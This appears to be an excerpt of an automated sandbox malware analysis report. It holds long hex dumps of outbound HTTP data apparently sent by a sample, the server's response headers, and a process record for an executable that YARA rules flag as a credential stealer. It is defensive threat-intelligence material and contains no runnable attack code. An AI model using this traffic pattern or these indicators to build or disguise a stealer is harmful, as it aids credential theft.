                                                                                                                                                                                                                                        2024-12-18 14:18:07 UTC15331OUTData Raw: c5 61 e6 e6 10 b9 7b 27 b8 d1 7c 04 37 79 25 d6 50 7a a3 80 6e 16 f2 d2 9b bf ef 59 48 d7 d7 86 b5 21 cb 87 3c a3 9f 1f 10 1a 90 b1 5a e3 f3 cf 3f 7f 8d 39 91 25 33 94 12 97 2c 90 2c 3d 92 44 fd 91 72 53 a7 12 b7 7a ea 1b cf b0 fc 68 5d 78 88 2e ba 4d 2c 60 1f 71 17 9c ff f5 f3 dd 1c 7e 14 ea fb 54 e0 e5 5f c2 61 f7 0a cd 77 89 ed 10 24 2e 96 f9 8c df d4 8f f0 d2 2a cc a4 b7 15 ae 3c a9 0b 74 4f 8b 8c 88 d8 3c 78 19 79 bb ee 59 41 f8 37 ea 4c fa 1c 4b 1d 75 6a 5d 9c 61 b7 a7 05 7d 75 3f 3e 8d 36 4f 6c fe 62 28 ba 32 2c 43 17 fa 98 4d 99 21 b8 f1 82 4b 0a 1a 90 63 5b eb 74 a5 cd 76 69 ff c6 bd ba f9 d0 c4 e0 99 9b 15 1b d7 7c da 4f 1f 29 b1 df 1e 2f 9a ff f1 8c e5 2f 51 5c ec 08 f0 93 3e 4b 3f 35 06 9e 39 27 cf c5 1a ac 59 3e b5 59 ff 3b 92 90 a9 9f 60 9d
                                                                                                                                                                                                                                        Data Ascii: a{'|7y%PznYH!<Z?9%3,,=DrSzh]x.M,`q~T_aw$.*<tO<xyYA7LKuj]a}u?>6Olb(2,CM!Kc[tvi|O)//Q\>K?59'Y>Y;`
                                                                                                                                                                                                                                        2024-12-18 14:18:07 UTC15331OUTData Raw: 6f 21 03 49 f6 dd d5 3f c9 6f a9 01 5b bf 6a 5e 73 14 48 a5 b0 9a 7c f0 86 76 2a 47 7f 72 14 7c d2 33 ea 8c d3 67 e7 6a ab 05 fa 45 46 7f fe cd 46 62 25 96 0e 0c 5a 7d ce 88 8e e5 6e 75 e6 5f ff 8f a1 56 9f e5 f0 bb 26 af d4 0e 65 01 e2 47 af 98 1a a0 8e 9b 1c d0 02 b1 bf 04 f1 5f e6 c3 26 9e e3 7c 3e 57 aa b5 1e 6e 79 d5 70 93 24 c6 15 e7 3f a0 40 e4 b5 f6 9a 1a 4f 1e 02 f9 5e a1 b4 27 6c 58 ec f9 88 cc 5f 79 86 ed 00 8c 7c eb da d1 c1 48 90 5a fb e6 54 d2 f5 58 05 f5 04 40 6d 35 8a fe 42 ea 24 a8 87 55 7b cd 25 36 86 fe ed 91 bc c9 b3 a0 35 b4 7e 8e 4e 32 fa 08 27 93 d2 59 86 37 82 eb 17 c3 39 79 19 7a bc 19 31 11 4d 6d cb 89 8b 47 92 e6 c2 bc 7f ae 37 ea 92 54 b6 72 7c 16 3c 92 f2 7e d8 0c 89 6d 5d ca ee b9 58 a8 09 56 61 42 c2 67 37 38 ff 6e 6c 2f bb
                                                                                                                                                                                                                                        Data Ascii: o!I?o[j^sH|v*Gr|3gjEFFb%Z}nu_V&eG_&|>Wnyp$?@O^'lX_y|HZTX@m5B$U{%65~N2'Y79yz1MmG7Tr|<~m]XVaBg78nl/
                                                                                                                                                                                                                                        2024-12-18 14:18:07 UTC15331OUTData Raw: 05 d1 54 00 b1 ae 15 71 bd c1 5a 29 23 5e 60 17 ea de ab ba c3 42 72 91 c7 f4 18 a8 36 ae c3 87 37 1f 49 89 8e 44 0f 8b 09 bd 2f ea 38 ce db 79 9e cb 78 f5 58 c6 9a 5c d3 a8 b8 c3 72 ec ab ef c6 01 d4 f5 77 bc 0e a1 7a 8b 16 2d f8 35 85 c9 df a7 50 23 69 dc 05 11 a2 66 46 50 bf 01 72 74 5b 5d ea cd ab c0 c8 0c ca 78 a0 81 79 44 dd b8 ec 7c 6b 97 10 15 57 ca 3b 1b f2 bf 85 e3 46 ab 38 e0 6a 0b 3b 80 44 a7 84 cb 1a 15 68 17 01 f5 85 02 74 99 37 e3 34 d9 04 14 48 fe fd c1 c7 f5 18 19 dc ea 4e ad e1 6a e7 53 68 70 50 43 00 c2 93 0d eb aa 3b 64 a0 8c 52 20 29 1e 8b e1 39 ba d5 12 9c fa 42 67 f6 e7 f5 46 da 0b db 03 55 9d b1 5c c7 f9 20 f5 10 9c 9c b9 19 2e a3 5e 2a 48 2d 79 d2 5d 2e 8a a9 80 f8 d6 8a cb 25 c9 87 11 9b c7 56 dc 1c 22 98 42 6d 30 30 93 8a 4f f7
                                                                                                                                                                                                                                        Data Ascii: TqZ)#^`Br67ID/8yxX\rwz-5P#ifFPrt[]xyD|kW;F8j;Dht74HNjShpPC;dR )9BgFU\ .^*H-y].%V"Bm00O
                                                                                                                                                                                                                                        2024-12-18 14:18:07 UTC15331OUTData Raw: dd fb 04 69 7c cf b0 78 32 7f 7b 3b 73 7a 9a 14 47 4d 04 3b 0e a9 4f e9 7d 52 93 15 b8 93 37 4b 6a a4 1a 89 13 d8 b2 a0 27 bd c8 98 17 7a ba 1f f9 06 bb 82 84 de 80 58 a2 bd 07 0a 85 92 1c d5 fc ed d0 d6 b4 0a 57 9c ef ae c6 a6 9c 79 88 10 2f 90 5a 42 31 46 ef c5 11 ae ff 51 8b 8d 16 18 9f 7f 38 6b 5e d3 65 a6 b4 5e 3e 78 fe 77 da e2 9a 65 29 34 5f 00 b7 1d 8e 5c ce f0 41 57 ec b1 08 5a be 72 c5 06 0f 5e 96 fd 7b b0 de 0d f9 6a 76 20 24 09 24 f1 a3 e5 ec 7d 15 5f c6 ec c3 75 2d 88 ad f1 a3 fc 89 10 ef ff 70 9d 46 53 45 df 56 ad 19 3b 29 ad d1 e6 c0 dc a4 ab f5 f0 0d 9f cd 96 f8 8b b7 c8 7d 26 8d 16 79 84 d4 00 8e e5 33 35 f5 a6 ec b8 d8 d8 f0 1c 23 6a 6c 50 86 04 fe 57 77 91 f6 6a 31 a1 ad 75 43 af 85 8c 13 b8 34 aa 36 f7 0b 4c 5f c6 3c 57 14 04 89 0f a9
                                                                                                                                                                                                                                        Data Ascii: i|x2{;szGM;O}R7Kj'zXWy/ZB1FQ8k^e^>xwe)4_\AWZr^{jv $$}_u-pFSEV;)}&y35#jlPWwj1uC46L_<W
                                                                                                                                                                                                                                        2024-12-18 14:18:07 UTC15331OUTData Raw: 98 3a 83 23 5a d0 93 05 5e c9 f3 83 e6 1e c6 bb dd c7 46 29 e2 9e 77 b3 84 75 71 06 d9 3e d8 ed 1f 85 21 f2 ec fa 61 b7 2b 82 a3 59 55 90 55 00 0a 02 af d1 a9 ad e9 50 fe 35 f2 a6 29 54 c1 7f 03 19 ee 1f d4 c1 ac 05 8e aa 8d 34 28 e2 b6 73 84 1b 4c 33 65 e4 5f 65 55 f0 bf 2f 5b e3 11 c5 0b 93 ca f8 28 d4 76 ac 9a 76 93 9a 4b e4 e4 ca 8f 77 54 75 39 ca 22 de 70 e5 b4 f1 7c 54 67 fb de 9d a6 97 5f 4b 75 6e bf e3 3c 13 1b 6e 3e 22 d2 f2 06 1c ec 8d 56 98 fb 69 58 52 85 39 80 12 49 c4 e1 88 4c a5 22 6f cc 73 29 fb 2f 86 78 ec 59 b2 6e ef 9a 97 07 7f 42 2f 93 d6 83 4a a2 43 ac e6 33 b0 90 7c 39 88 0d 7f 3d ee 8f a0 9d 39 fc 6a c7 72 c2 6e f7 f7 a9 96 24 13 34 52 70 66 8b 6c cb 54 49 f4 a8 94 ec 77 05 0c ff 59 55 48 d5 82 d8 a5 35 5d fa ba a6 b3 44 2e 3a 4e 88
                                                                                                                                                                                                                                        Data Ascii: :#Z^F)wuq>!a+YUUP5)T4(sL3e_eU/[(vvKwTu9"p|Tg_Kun<n>"ViXR9IL"os)/xYnB/JC3|9=9jrn$4RpflTIwYUH5]D.:N
                                                                                                                                                                                                                                        2024-12-18 14:18:07 UTC15331OUTData Raw: 9f 65 0e 78 03 92 27 cb 11 14 b8 a2 8c d1 40 96 2f 61 63 5b 70 24 8a ea c8 3d a3 4a ef f8 d1 69 37 0b 32 3f 30 b4 1b ea 2e 5b 93 87 9f 91 f4 65 25 4a 09 fa 2d 28 61 b0 29 17 a3 8f 30 bb de ae c9 4f b7 a3 20 aa 9d e4 a4 01 09 ee 23 8c 41 5f 5f 34 6a a4 02 20 0a c9 6a 6c 9c 85 1f 03 14 49 df 74 61 0e 0b bd 80 a2 6e 0b 81 19 38 05 72 8a 04 d8 b5 27 13 1d 62 71 ea 2f 34 a4 4c d0 df 67 b3 41 1b d2 ac 22 3f d9 32 09 7d e6 b3 e4 bb e5 44 c1 69 43 b4 73 27 d3 04 c5 2b da 33 98 5f db 79 44 2f 09 6a 4c a0 01 78 6a d5 73 ab c2 6e 6a 13 82 a5 8e 59 a3 cd 41 8f df 05 4b 71 b6 61 db d7 f2 11 94 24 54 af b0 87 51 17 5b fe d6 25 10 ce 7f d3 f3 82 f6 f0 9d 65 6e f7 4d fe 10 ca 81 3e 68 ca 12 f7 73 62 15 b9 76 40 fc 7e b8 bf 04 87 59 c9 6f df 66 03 b0 d0 cf 67 24 b5 8c 08
                                                                                                                                                                                                                                        Data Ascii: ex'@/ac[p$=Ji72?0.[e%J-(a)0O #A__4j jlItan8r'bq/4LgA"?2}DiCs'+3_yD/jLxjsnjYAKqa$TQ[%enM>hsbv@~Yofg$
                                                                                                                                                                                                                                        2024-12-18 14:18:07 UTC15331OUTData Raw: e7 8b b0 9c ca ad cf 64 de 8b ca c1 f2 da e4 8e 2e 34 7a eb ab 0a b5 10 cc 80 a3 60 7a 2c 1c 08 f0 22 84 c6 d3 6e d1 75 33 45 75 d7 a2 82 71 4b 60 02 8b 5a 4c 34 41 9e 1d b6 2c 88 0f 88 8b a9 65 7b 0a dd 46 6b 1b 47 4b e7 9d 69 d1 ee b7 e4 52 80 44 9c 2c ff f0 e8 87 9e 2c 89 10 6d 9b 8a d0 d9 bb 44 6d 31 57 8e f3 29 5f b1 13 e3 9c 72 21 ce 9a d3 0f ff 9f 0c 44 f8 23 a5 a5 4a 08 18 3b fa ab 72 fe b8 49 77 50 04 c9 da d2 d5 8a 10 35 ff a3 02 f2 34 1a e4 bc 21 e9 5f 79 11 13 fd 49 65 2d e0 41 69 c4 1d b2 15 d2 76 f0 b6 7e 5b eb 11 14 a1 ba 5d e6 96 cb 9b 3c 10 56 f4 80 96 8f 42 e9 dd 30 6c 60 4d 60 4f 81 50 7f 21 a0 bc 0c 0a c2 31 ff 7b 05 0e a9 0d f1 eb 58 3f 04 8c dc 6e 66 a8 0e f4 83 32 6e e1 3a 93 9d 47 0e 61 48 fd 0c 63 bb b7 74 08 56 43 e0 ba 34 db 46
                                                                                                                                                                                                                                        Data Ascii: d.4z`z,"nu3EuqK`ZL4A,e{FkGKiRD,,mDm1W)_r!D#J;rIwP54!_yIe-Aiv~[]<VB0l`M`OP!1{X?nf2n:GaHctVC4F
                                                                                                                                                                                                                                        2024-12-18 14:18:07 UTC15331OUTData Raw: 27 98 7f 07 63 9f 31 42 fd 6f b9 45 bf 32 44 de 8a 7a f7 73 26 10 bb 15 3f 31 10 99 a2 16 a4 71 0e 63 2c 6d b8 ba d9 aa cd 8e 30 2f 06 22 a4 72 e4 62 66 bd 9a 8d 37 a1 3f ea 4e f0 9c 49 73 40 2d 3a 5e 30 fb e8 5a 3d 03 13 ad aa 5c 30 47 2f 79 25 fa ac 76 f9 d8 52 a0 df 21 33 0b 05 90 38 85 a4 9f c4 18 f2 18 d7 b5 be 5b 97 f5 29 17 4f 0d 18 22 fc 2f 17 d0 8b f6 7f fe d1 2d 00 5e b8 d0 04 39 17 45 e6 7e ee 48 a5 46 53 05 c1 71 18 f7 ef c4 74 4a 6b 7d ed 7d 31 02 af a0 fb 73 f7 27 6e 5f 35 36 e2 9e a0 b0 2c a7 38 0d f7 9a e9 88 0d 7d 79 5a c7 5d 1f 2b 92 dc eb 67 26 44 08 4c bf 10 8f 06 f8 6e ff f9 be 07 e7 8b a1 d0 7f 37 cf 8f 24 4c a3 62 04 81 fe 11 3b 8c 21 f3 8e 75 15 00 a5 0d 0a 4c 7c e2 5d 3a 3f 29 9d 54 3b c1 d1 fb 77 0b 22 3d 81 80 47 30 a3 64 f1 a1
                                                                                                                                                                                                                                        Data Ascii: 'c1BoE2Dzs&?1qc,m0/"rbf7?NIs@-:^0Z=\0G/y%vR!38[)O"/-^9E~HFSqtJk}}1s'n_56,8}yZ]+g&DLn7$Lb;!uL|]:?)T;w"=G0d
                                                                                                                                                                                                                                        2024-12-18 14:18:14 UTC1049INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Wed, 18 Dec 2024 14:18:14 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=rvs2eepckrirl1gq7ufq9qkou1; expires=Sun, 13-Apr-2025 08:04:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vprXaRM4FBI%2BkCIt9nHgMBr00YM%2BHwnpKLLgtUrkMGVPpgaRL6CnP%2BSaGoVvwzH7lefX7vjRIIeNF%2FHDj6QdOuOHgGHhYki%2BexURZzqzODEmbEFvqHSv8YitYEeTRVY9Z1Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8f3fc7c8fc5a4315-EWR
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=24279&min_rtt=1664&rtt_var=14132&sent=305&recv=622&lost=0&retrans=0&sent_bytes=2836&recv_bytes=597097&delivery_rate=1754807&cwnd=218&unsent_bytes=0&cid=2910d97bbd5dfd0b&ts=6564&x=0"


                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                        Start time:09:17:34
                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\ji2xlo1f.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\ji2xlo1f.exe"
                                                                                                                                                                                                                                        Imagebase:0x6a0000
                                                                                                                                                                                                                                        File size:6'289'408 bytes
                                                                                                                                                                                                                                        MD5 hash:9F8CA917737B3233ABB943EDC065659C
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.2446810949.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                        No disassembly